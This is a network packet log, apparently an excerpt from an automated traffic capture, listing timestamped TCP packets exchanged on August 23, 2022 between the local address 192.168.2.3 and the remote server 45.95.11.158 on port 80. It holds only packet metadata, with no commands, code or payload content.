Aug 23, 2022 18:23:57.530517101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530555010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530579090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530602932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530626059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530642033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.530648947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530664921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.530673027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530725002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.530735016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530776978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.530805111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530849934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.530873060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.530914068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.530955076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531012058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531040907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531090975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531208992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531261921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531265020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531303883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531343937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531398058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531403065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531441927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531481028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531522036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531558037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531584024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531600952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531622887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531653881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531707048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531728983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531769037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531775951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531807899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.531925917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.531972885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532001972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532054901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532075882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532119036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532150030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532191038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532193899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532238960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532274961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532324076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532358885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532403946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532440901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532489061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532521009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532546997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532573938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532587051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532644033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532810926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.532844067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.532859087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533088923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533147097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533160925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533209085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533291101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533315897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533345938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533358097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533384085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533425093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533477068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533502102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533569098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533575058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533576012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533600092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533615112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533639908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533720970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533751965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533766985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533792019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533834934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533885956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533924103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.533965111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.533992052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534018040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534035921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534054995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534127951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534194946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534235001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534259081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534288883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534315109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534363031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534395933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534403086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534418106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534432888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534457922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534866095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.534913063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.534985065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535027027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535037994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535078049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535082102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535123110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535161018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535207987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535240889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535259008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535284996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535298109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535375118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535417080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535433054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535456896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535474062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535485983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535492897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535581112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535589933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535618067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535635948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535653114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535800934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535834074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535855055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535857916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535871983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535881042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535898924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535904884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.535923004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535942078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.535979033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536021948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.536161900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536189079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536212921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536276102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.536290884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.536391020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536417007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536442995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.536457062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.536504984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.536559105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550571918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550606966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550631046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550657988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550661087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550681114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550704956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550720930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550817966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550842047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550865889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550892115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.550971985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.550996065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551022053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551038027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551045895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551049948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551068068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551089048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551340103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551412106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551434040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551434040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551456928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551457882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551481009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551482916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551506042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.551549911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.551580906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.553230047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553258896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553280115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553301096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553313017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.553322077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553330898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.553344965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553389072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.553391933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553442001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553462982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.553476095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.553505898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.556420088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.556451082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.556473970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.556505919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.556543112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.556549072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.556593895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.556601048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.556623936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.556644917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.556669950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.557729006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.557794094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576385975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576419115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576442957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576459885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576464891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576474905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576488972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576503038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576548100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576550007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576576948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576596975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576627016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576735973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576762915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576785088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576797962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576800108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576834917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576905966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.576951027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.576993942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577033043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577084064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577116013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577128887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577172995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577179909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577210903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577277899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577327013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577366114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577392101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577404022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577429056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577450991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577490091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577615023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577636957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577666044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577681065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577716112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577760935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577792883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577836990 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577867985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577910900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.577930927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.577970982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578037977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578102112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578131914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578191042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578207016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578227043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578253984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578264952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578282118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578325987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578356028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578386068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578404903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578425884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578465939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578507900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578625917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578676939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578797102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578843117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578872919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578890085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.578917980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.578938961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579133987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579191923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579313993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579332113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579370975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579381943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579406977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579425097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579452991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579462051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579562902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579581022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579610109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579622030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579658031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579675913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579700947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579725027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579750061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579767942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579792023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579803944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579880953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579926014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579941034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.579988003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.579998970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580040932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580070019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580107927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580117941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580168009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580202103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580221891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580262899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580275059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580341101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580359936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580377102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580391884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580403090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580425024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580442905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580457926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.580488920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.580504894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582391977 CEST	80	49827	45.95.11.158	192.168.2.3
